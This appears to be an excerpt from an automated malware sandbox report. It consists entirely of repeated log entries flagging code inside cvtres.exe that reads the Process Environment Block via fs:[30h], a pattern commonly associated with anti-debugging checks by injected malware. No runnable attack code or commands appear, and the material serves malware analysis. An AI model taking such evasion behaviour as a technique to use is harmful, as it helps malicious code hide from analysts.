          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CAE73 mov eax, dword ptr fs:[00000030h]3_2_055CAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CAE73 mov eax, dword ptr fs:[00000030h]3_2_055CAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CAE73 mov eax, dword ptr fs:[00000030h]3_2_055CAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CAE73 mov eax, dword ptr fs:[00000030h]3_2_055CAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CAE73 mov eax, dword ptr fs:[00000030h]3_2_055CAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B766D mov eax, dword ptr fs:[00000030h]3_2_055B766D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DA61C mov eax, dword ptr fs:[00000030h]3_2_055DA61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DA61C mov eax, dword ptr fs:[00000030h]3_2_055DA61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0565FE3F mov eax, dword ptr fs:[00000030h]3_2_0565FE3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AC600 mov eax, dword ptr fs:[00000030h]3_2_055AC600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AC600 mov eax, dword ptr fs:[00000030h]3_2_055AC600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AC600 mov eax, dword ptr fs:[00000030h]3_2_055AC600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D8E00 mov eax, dword ptr fs:[00000030h]3_2_055D8E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05661608 mov eax, dword ptr fs:[00000030h]3_2_05661608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AE620 mov eax, dword ptr fs:[00000030h]3_2_055AE620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D36CC mov eax, dword ptr fs:[00000030h]3_2_055D36CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E8EC7 mov eax, dword ptr fs:[00000030h]3_2_055E8EC7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0565FEC0 mov eax, dword ptr fs:[00000030h]3_2_0565FEC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05678ED6 mov eax, dword ptr fs:[00000030h]3_2_05678ED6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B76E2 mov eax, dword ptr fs:[00000030h]3_2_055B76E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D16E0 mov ecx, dword ptr fs:[00000030h]3_2_055D16E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05670EA5 mov eax, dword ptr fs:[00000030h]3_2_05670EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05670EA5 mov eax, dword ptr fs:[00000030h]3_2_05670EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05670EA5 mov eax, dword ptr fs:[00000030h]3_2_05670EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056246A7 mov eax, dword ptr fs:[00000030h]3_2_056246A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0563FE87 mov eax, dword ptr fs:[00000030h]3_2_0563FE87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB944 mov eax, dword ptr fs:[00000030h]3_2_055CB944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB944 mov eax, dword ptr fs:[00000030h]3_2_055CB944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AB171 mov eax, dword ptr fs:[00000030h]3_2_055AB171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AB171 mov eax, dword ptr fs:[00000030h]3_2_055AB171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AC962 mov eax, dword ptr fs:[00000030h]3_2_055AC962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A9100 mov eax, dword ptr fs:[00000030h]3_2_055A9100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A9100 mov eax, dword ptr fs:[00000030h]3_2_055A9100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A9100 mov eax, dword ptr fs:[00000030h]3_2_055A9100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D513A mov eax, dword ptr fs:[00000030h]3_2_055D513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D513A mov eax, dword ptr fs:[00000030h]3_2_055D513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C4120 mov eax, dword ptr fs:[00000030h]3_2_055C4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C4120 mov eax, dword ptr fs:[00000030h]3_2_055C4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C4120 mov eax, dword ptr fs:[00000030h]3_2_055C4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C4120 mov eax, dword ptr fs:[00000030h]3_2_055C4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C4120 mov ecx, dword ptr fs:[00000030h]3_2_055C4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056341E8 mov eax, dword ptr fs:[00000030h]3_2_056341E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AB1E1 mov eax, dword ptr fs:[00000030h]3_2_055AB1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AB1E1 mov eax, dword ptr fs:[00000030h]3_2_055AB1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AB1E1 mov eax, dword ptr fs:[00000030h]3_2_055AB1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056649A4 mov eax, dword ptr fs:[00000030h]3_2_056649A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056649A4 mov eax, dword ptr fs:[00000030h]3_2_056649A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056649A4 mov eax, dword ptr fs:[00000030h]3_2_056649A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056649A4 mov eax, dword ptr fs:[00000030h]3_2_056649A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056269A6 mov eax, dword ptr fs:[00000030h]3_2_056269A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D2990 mov eax, dword ptr fs:[00000030h]3_2_055D2990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DA185 mov eax, dword ptr fs:[00000030h]3_2_055DA185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056251BE mov eax, dword ptr fs:[00000030h]3_2_056251BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056251BE mov eax, dword ptr fs:[00000030h]3_2_056251BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056251BE mov eax, dword ptr fs:[00000030h]3_2_056251BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056251BE mov eax, dword ptr fs:[00000030h]3_2_056251BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CC182 mov eax, dword ptr fs:[00000030h]3_2_055CC182
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C99BF mov ecx, dword ptr fs:[00000030h]3_2_055C99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C99BF mov ecx, dword ptr fs:[00000030h]3_2_055C99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C99BF mov eax, dword ptr fs:[00000030h]3_2_055C99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C99BF mov ecx, dword ptr fs:[00000030h]3_2_055C99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C99BF mov ecx, dword ptr fs:[00000030h]3_2_055C99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C99BF mov eax, dword ptr fs:[00000030h]3_2_055C99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C99BF mov ecx, dword ptr fs:[00000030h]3_2_055C99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C99BF mov ecx, dword ptr fs:[00000030h]3_2_055C99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C99BF mov eax, dword ptr fs:[00000030h]3_2_055C99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C99BF mov ecx, dword ptr fs:[00000030h]3_2_055C99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C99BF mov ecx, dword ptr fs:[00000030h]3_2_055C99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C99BF mov eax, dword ptr fs:[00000030h]3_2_055C99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D61A0 mov eax, dword ptr fs:[00000030h]3_2_055D61A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D61A0 mov eax, dword ptr fs:[00000030h]3_2_055D61A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C0050 mov eax, dword ptr fs:[00000030h]3_2_055C0050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C0050 mov eax, dword ptr fs:[00000030h]3_2_055C0050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05671074 mov eax, dword ptr fs:[00000030h]3_2_05671074
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05662073 mov eax, dword ptr fs:[00000030h]3_2_05662073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA830 mov eax, dword ptr fs:[00000030h]3_2_055CA830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA830 mov eax, dword ptr fs:[00000030h]3_2_055CA830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA830 mov eax, dword ptr fs:[00000030h]3_2_055CA830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA830 mov eax, dword ptr fs:[00000030h]3_2_055CA830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D002D mov eax, dword ptr fs:[00000030h]3_2_055D002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D002D mov eax, dword ptr fs:[00000030h]3_2_055D002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D002D mov eax, dword ptr fs:[00000030h]3_2_055D002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D002D mov eax, dword ptr fs:[00000030h]3_2_055D002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D002D mov eax, dword ptr fs:[00000030h]3_2_055D002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055BB02A mov eax, dword ptr fs:[00000030h]3_2_055BB02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055BB02A mov eax, dword ptr fs:[00000030h]3_2_055BB02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055BB02A mov eax, dword ptr fs:[00000030h]3_2_055BB02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055BB02A mov eax, dword ptr fs:[00000030h]3_2_055BB02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05674015 mov eax, dword ptr fs:[00000030h]3_2_05674015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05674015 mov eax, dword ptr fs:[00000030h]3_2_05674015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05627016 mov eax, dword ptr fs:[00000030h]3_2_05627016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05627016 mov eax, dword ptr fs:[00000030h]3_2_05627016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05627016 mov eax, dword ptr fs:[00000030h]3_2_05627016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0563B8D0 mov eax, dword ptr fs:[00000030h]3_2_0563B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0563B8D0 mov ecx, dword ptr fs:[00000030h]3_2_0563B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0563B8D0 mov eax, dword ptr fs:[00000030h]3_2_0563B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0563B8D0 mov eax, dword ptr fs:[00000030h]3_2_0563B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0563B8D0 mov eax, dword ptr fs:[00000030h]3_2_0563B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0563B8D0 mov eax, dword ptr fs:[00000030h]3_2_0563B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A58EC mov eax, dword ptr fs:[00000030h]3_2_055A58EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB8E4 mov eax, dword ptr fs:[00000030h]3_2_055CB8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB8E4 mov eax, dword ptr fs:[00000030h]3_2_055CB8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A40E1 mov eax, dword ptr fs:[00000030h]3_2_055A40E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A40E1 mov eax, dword ptr fs:[00000030h]3_2_055A40E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A40E1 mov eax, dword ptr fs:[00000030h]3_2_055A40E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A9080 mov eax, dword ptr fs:[00000030h]3_2_055A9080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DF0BF mov ecx, dword ptr fs:[00000030h]3_2_055DF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DF0BF mov eax, dword ptr fs:[00000030h]3_2_055DF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DF0BF mov eax, dword ptr fs:[00000030h]3_2_055DF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05623884 mov eax, dword ptr fs:[00000030h]3_2_05623884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05623884 mov eax, dword ptr fs:[00000030h]3_2_05623884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E90AF mov eax, dword ptr fs:[00000030h]3_2_055E90AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D20A0 mov eax, dword ptr fs:[00000030h]3_2_055D20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D20A0 mov eax, dword ptr fs:[00000030h]3_2_055D20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D20A0 mov eax, dword ptr fs:[00000030h]3_2_055D20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D20A0 mov eax, dword ptr fs:[00000030h]3_2_055D20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D20A0 mov eax, dword ptr fs:[00000030h]3_2_055D20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D20A0 mov eax, dword ptr fs:[00000030h]3_2_055D20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AF358 mov eax, dword ptr fs:[00000030h]3_2_055AF358
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055ADB40 mov eax, dword ptr fs:[00000030h]3_2_055ADB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D3B7A mov eax, dword ptr fs:[00000030h]3_2_055D3B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D3B7A mov eax, dword ptr fs:[00000030h]3_2_055D3B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055ADB60 mov ecx, dword ptr fs:[00000030h]3_2_055ADB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05678B58 mov eax, dword ptr fs:[00000030h]3_2_05678B58
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA309 mov eax, dword ptr fs:[00000030h]3_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566131B mov eax, dword ptr fs:[00000030h]3_2_0566131B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056523E3 mov ecx, dword ptr fs:[00000030h]3_2_056523E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056523E3 mov ecx, dword ptr fs:[00000030h]3_2_056523E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056523E3 mov eax, dword ptr fs:[00000030h]3_2_056523E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056253CA mov eax, dword ptr fs:[00000030h]3_2_056253CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056253CA mov eax, dword ptr fs:[00000030h]3_2_056253CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CDBE9 mov eax, dword ptr fs:[00000030h]3_2_055CDBE9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D03E2 mov eax, dword ptr fs:[00000030h]3_2_055D03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D03E2 mov eax, dword ptr fs:[00000030h]3_2_055D03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D03E2 mov eax, dword ptr fs:[00000030h]3_2_055D03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D03E2 mov eax, dword ptr fs:[00000030h]3_2_055D03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D03E2 mov eax, dword ptr fs:[00000030h]3_2_055D03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D03E2 mov eax, dword ptr fs:[00000030h]3_2_055D03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05675BA5 mov eax, dword ptr fs:[00000030h]3_2_05675BA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D2397 mov eax, dword ptr fs:[00000030h]3_2_055D2397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DB390 mov eax, dword ptr fs:[00000030h]3_2_055DB390
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B1B8F mov eax, dword ptr fs:[00000030h]3_2_055B1B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B1B8F mov eax, dword ptr fs:[00000030h]3_2_055B1B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D138B mov eax, dword ptr fs:[00000030h]3_2_055D138B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D138B mov eax, dword ptr fs:[00000030h]3_2_055D138B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D138B mov eax, dword ptr fs:[00000030h]3_2_055D138B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0565D380 mov ecx, dword ptr fs:[00000030h]3_2_0565D380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566138A mov eax, dword ptr fs:[00000030h]3_2_0566138A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D4BAD mov eax, dword ptr fs:[00000030h]3_2_055D4BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D4BAD mov eax, dword ptr fs:[00000030h]3_2_055D4BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D4BAD mov eax, dword ptr fs:[00000030h]3_2_055D4BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0565B260 mov eax, dword ptr fs:[00000030h]3_2_0565B260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0565B260 mov eax, dword ptr fs:[00000030h]3_2_0565B260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05678A62 mov eax, dword ptr fs:[00000030h]3_2_05678A62
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A9240 mov eax, dword ptr fs:[00000030h]3_2_055A9240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A9240 mov eax, dword ptr fs:[00000030h]3_2_055A9240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A9240 mov eax, dword ptr fs:[00000030h]3_2_055A9240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A9240 mov eax, dword ptr fs:[00000030h]3_2_055A9240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E927A mov eax, dword ptr fs:[00000030h]3_2_055E927A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566EA55 mov eax, dword ptr fs:[00000030h]3_2_0566EA55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05634257 mov eax, dword ptr fs:[00000030h]3_2_05634257
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C3A1C mov eax, dword ptr fs:[00000030h]3_2_055C3A1C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A5210 mov eax, dword ptr fs:[00000030h]3_2_055A5210
